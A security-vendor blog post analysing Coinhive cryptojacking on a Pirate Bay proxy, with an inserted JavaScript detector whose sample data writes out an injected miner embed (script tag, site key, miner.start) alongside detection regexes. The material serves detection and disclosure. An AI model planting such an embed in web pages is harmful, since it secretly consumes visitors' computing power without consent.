23 January 2018

In-browser Cryptojacking at full throttle!

Written by Prashant Kadam
Malware, Security

Cryptocurrencies like Bitcoin, Monero, Ethereum, Litecoin, and Tezos are in full swing, and they have exponentially increased cryptocurrency mining (or cryptomining) activity. Previously, cryptomining was carried out on powerful, dedicated mining hardware or by utilizing distributed computing, because the entire process requires a lot of computation. However, there has been an observable change in mining trends. Now web browsers are taking part in cryptomining, and this activity is growing because the computing power needed for browser mining is much less than that required for hardware mining. Using web browsers to mine cryptocurrency is termed In-browser Cryptojacking.

Quick Heal Security Labs has come across some popular websites that are compromised with the Coinhive browser mining service.

What is Coinhive?

Coinhive is a browser mining service which offers a JavaScript miner for the ‘Monero’ blockchain. It can be easily embedded in a website. When users access a Coinhive-injected website, the miner script is executed in the web browser and starts mining Monero (XMR).

We suspect many businesses use this browser-mining service by integrating a piece of JavaScript code into their website, which consumes its visitors’ CPU time and energy to mine XMR (Monero) for Coinhive. Coinhive, in return, pays out some percentage of the mined value to the website’s owner.

Our analysis

At Quick Heal Security Labs, we noticed that one of the proxy services of a famous torrent search engine called Pirate Bay was injected with the Coinhive miner service. Fig 1 below shows content injected into the Pirate Bay webpage.

Fig 1. Fiddler session screen-shot of Pirate Bay Website

As per the Coinhive official information, ‘OT1CIcpkIOCO7yVMxcJiqmSWoDWOri06’ is the user site key, and the throttle parameter is used to limit CPU usage. Below are the throttle levels.

  • throttle: 0 – CPU usage limited to 100%
  • throttle: 0.3 – CPU usage limited to 80%
  • throttle: 0.5 – CPU usage limited to 50%-70%

After accessing the Pirate Bay website, CoinHive.min.js got executed and started mining. The CPU usage reached the limit defined by its throttle level. On some websites it is set to 0.5, so that particular browser instance takes 50%-70% of the available computation. Fig 2 shows the CPU usage of the browser and of the overall system observed after accessing the Pirate Bay website.

Fig 2. CPU Usage after accessing Pirate Bay

Another important thing observed in the ‘CoinHive.min.js’ file is the use of WebAssembly. WebAssembly runs inside the web browser: it is a low-level, assembly-like language that executes with near-native performance, which is the major reason for implementing the mining functionality in it.

Fig 3. WebAssembly module integration

The miner uses the CryptonightWASMWrapper WebAssembly module to compute hashes. A hash function is an efficiently computable function which maps data of arbitrary size to data of a fixed size and behaves similarly to a random function.
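The indicators described above (a reference to the Coinhive miner script, a start call carrying the site key and throttle, and the CryptonightWASMWrapper string in the miner body) can be checked over captured HTTP response bodies, much like the Fiddler session in Fig 1. The following is an added example, not code from the Seqrite post or from Coinhive; the `CoinHive.Anonymous(siteKey, {throttle})` embed shape and the sample responses are assumptions constructed for illustration.

```javascript
// Added example: scan captured response bodies for the Coinhive-style
// cryptojacking indicators discussed in the post. Not Seqrite's code.
const MINER_SCRIPT_RE = /<script[^>]+src=["']([^"']*coinhive\.min\.js)["']/gi;
// Assumed embed shape: new CoinHive.Anonymous('<site key>', { throttle: x })
const MINER_START_RE =
  /new\s+CoinHive\.(?:Anonymous|User)\(\s*["']([A-Za-z0-9]+)["'](?:\s*,\s*(\{[^}]*\}))?/g;
const THROTTLE_RE = /throttle\s*:\s*([0-9]*\.?[0-9]+)/;
const WASM_MARKER = "CryptonightWASMWrapper";

// CPU limits as quoted in the post; other values are reported as unlisted.
function throttleToCpuLimit(throttle) {
  const levels = { 0: "100%", 0.3: "80%", 0.5: "50%-70%" };
  return levels[throttle] || "not listed";
}

// responses: [{ url, body }] as one would export from a proxy session.
function scanResponses(responses) {
  const findings = [];
  for (const { url, body } of responses) {
    for (const m of body.matchAll(MINER_SCRIPT_RE)) {
      findings.push({ url, kind: "script-include", src: m[1] });
    }
    for (const m of body.matchAll(MINER_START_RE)) {
      const t = THROTTLE_RE.exec(m[2] || "");
      const throttle = t ? parseFloat(t[1]) : 0; // no throttle option given
      findings.push({ url, kind: "miner-start", siteKey: m[1],
                      throttle, cpuLimit: throttleToCpuLimit(throttle) });
    }
    if (body.includes(WASM_MARKER)) {
      findings.push({ url, kind: "wasm-marker", marker: WASM_MARKER });
    }
  }
  return findings;
}

// Constructed sample session: an injected page plus a fragment of the
// miner script body. Site key is the one quoted in the post.
const SAMPLE_RESPONSES = [
  { url: "https://example.invalid/", body: `<html><body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('OT1CIcpkIOCO7yVMxcJiqmSWoDWOri06', {throttle: 0.5});
  miner.start();
</script></body></html>` },
  { url: "https://coinhive.com/lib/coinhive.min.js",
    body: "/* constructed fragment */ var w = CryptonightWASMWrapper; /* ... */" },
];

console.log(JSON.stringify(scanResponses(SAMPLE_RESPONSES), null, 2));
```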

This mining activity is not malicious in itself, but it runs without the approval of the system owner and consumes CPU power, which in turn slows down system performance. This bothers the user and hampers work significantly.

Seqrite detection

  • Seqrite has released generic detections to detect such in-browser Cryptojacking attacks.
  • These generic detections span over multiple security layers in our products.

Detection stats
Seqrite has successfully blocked the detected Coinhive miner activity. Below is the trend observed so far for the last few weeks.

Fig 4. Detection trend observed at Quick Heal Security Labs

In-browser mining is really an easy way to generate revenue for website owners and for mining service providers alike, and besides Coinhive, other providers like JSEcoin, MineMyTraffic, CryptoLoot, and CoinNebula are also taking part in it. In-browser mining is not a malicious activity in itself, but unauthorized mining and extensive CPU usage should not be permitted. Also, compromising one popular website can affect many users.

Malware authors are using these mining services to fulfill their malicious needs. We advise our users to avoid browsing suspicious websites and to keep their antivirus up to date to prevent their systems from being used in such mining activities.


Subject Matter Expert
Prashant Kadam | Quick Heal Security Labs
